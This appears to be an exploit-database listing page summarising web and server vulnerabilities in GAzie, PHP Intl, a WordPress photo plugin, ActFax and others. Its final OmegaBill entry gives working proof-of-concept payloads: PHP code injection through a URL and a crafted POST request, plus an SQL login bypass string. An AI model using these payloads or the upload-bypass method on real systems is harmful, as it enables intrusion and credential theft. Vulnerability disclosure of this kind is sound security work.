
Explore Vulnerabilities

Explore all Exploits:

GAzie 5.10 (Login parameter) Multiple Remote Vulnerabilities

GAzie is prone to cross-site scripting and SQL injection vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Compromising the entire database structure and executing system commands is possible through malicious SQL queries. The issues exist in the 'login_admin.php' script through the 'Login' parameter.

PHP 5.3.5 grapheme_extract() NULL Pointer Dereference

The Internationalization extension (hereafter referred to as Intl) is a wrapper for the ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts. A vulnerability exists in the grapheme_extract() function which can be exploited to cause a NULL pointer dereference. This can be triggered by calling the grapheme_extract() function with a negative value for the size parameter.

WordPress User Photo Component Remote File Upload Vulnerability

When a photo is uploaded, it is only partially validated and it is possible to upload a backdoor on the server hosting WordPress. This backdoor can be called (executed) even if the photo has not yet been approved. When a file is uploaded, its type is validated. Only the following types are accepted: image/jpeg, image/pjpeg, image/gif, image/png, image/x-png. The type is validated by verifying the MIME type of the uploaded file. A browser infers the MIME type from the file itself or from its extension, but it is possible to intercept the HTTP request and change it (using a proxy such as WebScarab). This way, any file can be uploaded as if it were an image. When a photo (an image) is uploaded, its size is checked. If it is too big, it is resized. To avoid this resizing, the uploaded file has to look like a small image.

Multi Agent System SQL Injection Vulnerability

Multi Agent System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue.

Real Estate Single SQL Injection Vulnerability

Real Estate Single is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example URI is available: http://www.example.com/resulttype.asp?probe=[Code]

ActFax Server FTP Remote BOF (post auth)

A buffer overflow vulnerability exists in ActFax Server FTP, which could allow an authenticated remote attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to insufficient boundary checks when handling user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted FTP request containing an overly long string. Successful exploitation could result in arbitrary code execution in the context of the application.

SQL Injection in Seo Panel

The vulnerability exists due to the failure of the "/websites.php" script to properly sanitize user-supplied input in the "url" variable. An attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

OmegaBill v1.0 Build 6

An authentication bypass/SQL injection vulnerability in OmegaBill v1.0 Build 6 can be exploited to retrieve a list of usernames and passwords.

Vulnerability 1:

http://localhost/OmegaBill_v1.0_Build6/clients/download_invoice.php?invoiceid=<?php system("calc.exe"); ?>

Vulnerability 2:

POST http://localhost/OmegaBill_v1.0_Build6/plugins/dompdf/www/examples.php HTTP/1.1
Host: localhost
Connection: keep-alive
User-Agent: x
Content-Length: 93
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="html"

<?php system("calc.exe"); ?>
------x--

SQL Injection:

http://localhost/OmegaBill_v1.0_Build6/login.php?username=admin'+or+'1'='1

Recent Exploits: